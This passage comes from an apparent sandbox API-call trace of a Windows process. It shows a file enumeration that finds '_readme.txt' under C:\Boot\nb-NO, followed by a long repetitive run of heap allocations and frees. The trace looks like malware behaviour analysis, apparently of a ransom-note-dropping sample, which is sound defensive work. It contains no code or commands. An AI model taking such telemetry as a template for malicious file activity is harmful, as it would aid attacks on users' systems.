ftLastWriteTime.dwLowDateTime=0xa19afca0, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x453, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0097.194] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.194] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x333fe70 [0097.194] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.194] PathFindExtensionW (pszPath="C:\\Boot\\nb-NO\\_readme.txt") returned=".txt" [0097.194] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333fe70 | out: hHeap=0x630000) returned 1 [0097.194] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa19afca0, ftCreationTime.dwHighDateTime=0x1d5d6b4, ftLastAccessTime.dwLowDateTime=0xa19afca0, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa19afca0, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x453, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0097.194] FindClose (in: hFindFile=0x670618 | out: hFindFile=0x670618) returned 1 [0097.195] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.195] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fde8 | out: hHeap=0x630000) returned 1 [0097.195] PeekMessageW (in: lpMsg=0x9e2ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9e2ff08) returned 0 [0097.195] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fde8 [0097.195] PeekMessageW (in: lpMsg=0x9e2fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9e2fb74) returned 0 [0097.195] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.195] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0097.195] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.195] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.195] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.195] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0097.195] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.195] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.195] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.195] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0097.195] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.195] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.195] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.196] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0097.196] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.196] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.196] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.196] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0097.196] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.196] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.196] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.196] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b78ec8 [0097.196] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.196] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.196] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.197] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0097.197] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc2e) returned 0x9b91b28 [0097.197] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.197] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b91b28 | out: hHeap=0x630000) returned 1 [0097.197] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.197] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.197] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0097.197] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.197] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.197] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.197] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b78ec8 [0097.197] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.197] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.197] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.197] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x333bc58 [0097.197] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0097.197] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.197] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.198] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x333bc58 [0097.198] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0097.198] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.198] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.198] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0097.198] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.198] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.198] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.198] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0097.198] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.198] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.198] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.198] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b78ec8 [0097.198] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.198] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.198] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.198] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b78ec8 [0097.198] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.198] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.198] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.198] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0097.199] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.199] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.199] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.199] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0097.199] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.199] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.199] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.199] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0097.199] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.199] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.199] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.199] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0097.199] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.199] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.199] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.199] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0097.199] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.199] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.199] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.199] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0097.199] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.199] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.199] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.199] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0097.200] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.200] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.200] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.200] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0097.200] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x9b91b28 [0097.200] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.200] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b91b28 | out: hHeap=0x630000) returned 1 [0097.200] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.200] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.200] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0097.200] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.200] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.200] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.200] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0097.200] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc2e) returned 0x9b91b28 [0097.200] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.200] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b91b28 | out: hHeap=0x630000) returned 1 [0097.200] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.200] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.200] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x333bc58 [0097.201] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0097.201] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.201] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.201] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x333bc58 [0097.201] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0097.201] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.201] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.201] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0097.201] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.201] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.201] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.201] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0097.201] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.201] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.201] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.201] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0097.201] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x9b91b28 [0097.201] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.202] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b91b28 | out: hHeap=0x630000) returned 1 [0097.202] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.202] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.202] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b78ec8 [0097.202] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.202] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.202] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.202] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b78ec8 [0097.202] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.202] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.202] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.202] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0097.202] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.202] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.202] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.202] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0097.202] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.202] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.202] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.202] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0097.202] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.202] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.203] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.203] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0097.203] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.203] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.203] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.203] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0097.203] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.203] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.203] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.203] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0097.203] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.203] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.203] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.203] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0097.203] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.203] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.203] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.203] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0097.203] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x9b91b28 [0097.203] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.203] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b91b28 | out: hHeap=0x630000) returned 1 [0097.204] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.204] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.204] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0097.204] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.204] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.204] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.204] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x333bc58 [0097.204] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0097.204] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.204] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.204] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x333bc58 [0097.204] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0097.204] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.204] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.204] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0097.204] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.204] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.204] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.204] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0097.204] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.205] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.205] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.205] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0097.205] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x9b91b28 [0097.205] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.205] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b91b28 | out: hHeap=0x630000) returned 1 [0097.205] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.205] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.205] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b78ec8 [0097.205] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.205] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.205] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.205] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b78ec8 [0097.205] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.205] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.205] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.205] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0097.205] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.205] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.205] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.205] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0097.205] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.206] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.206] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.206] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0097.206] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.206] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.206] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.206] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0097.206] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.206] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.206] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.206] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0097.206] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.206] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.206] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.206] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0097.206] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.206] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.206] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.206] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0097.206] HeapFree (in: hHeap=0x630000, dwFlags=0x0, 